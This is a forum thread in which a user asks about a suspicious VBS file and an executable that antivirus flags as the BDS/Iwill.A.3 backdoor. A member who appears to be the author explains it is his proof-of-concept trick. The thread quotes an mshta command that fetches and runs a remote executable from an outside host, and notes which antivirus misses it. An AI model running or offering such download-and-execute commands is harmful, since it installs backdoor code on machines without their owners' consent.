when i need to dl something quickly I usualy open a cmd and wget it, default it opens my homedir and today i find a weird vbs in this dir:


I already tried dl the exe myself, and my av detects it as being BDS/Iwill.A.3

now is this some remaining code from some program I dl from govsec? since a google for gravito led me to a link in a certain govsec member's signature...

If anyone could clear this up plz. I hate feeling 'compromized'

maybe u clicked one of illwill's POC links? ;D

last one was illmob.org/0day/firefox-download-and-execute.html, but this one just created a bat..

I'm probably getting way too paranoid

found it:

topic 13720

should have searched more before getting so paranoid!

lol soon as i seen the sec.gravito in the code .... i knew it was one of Yorns tricks

glad your paranoia has subsided

Yeah, you can probably ignore this if you've ever run the command:
"mshta http://sec.gravito.com/hta3/?test.exe+RUN"

I think most AV pick this up now, but MCAFEE doesn't. I haven't added in the randomization variable because it's not important.

And yeah, it's one of my tricks, no need to be paranoid. I'm not malicious, though I really could be if I wanted to go professional criminal.

tried running it again, just curious.

C:\DOCUMENTS AND.....\CONTENT.IE5\AJIVEX23\TEST[1].EXE

Contains a signature of the (dangerous) backdoor program BDS/Iwill.A.3 Backdoor server programs.

edit: running free-av but doesn't complain about the hta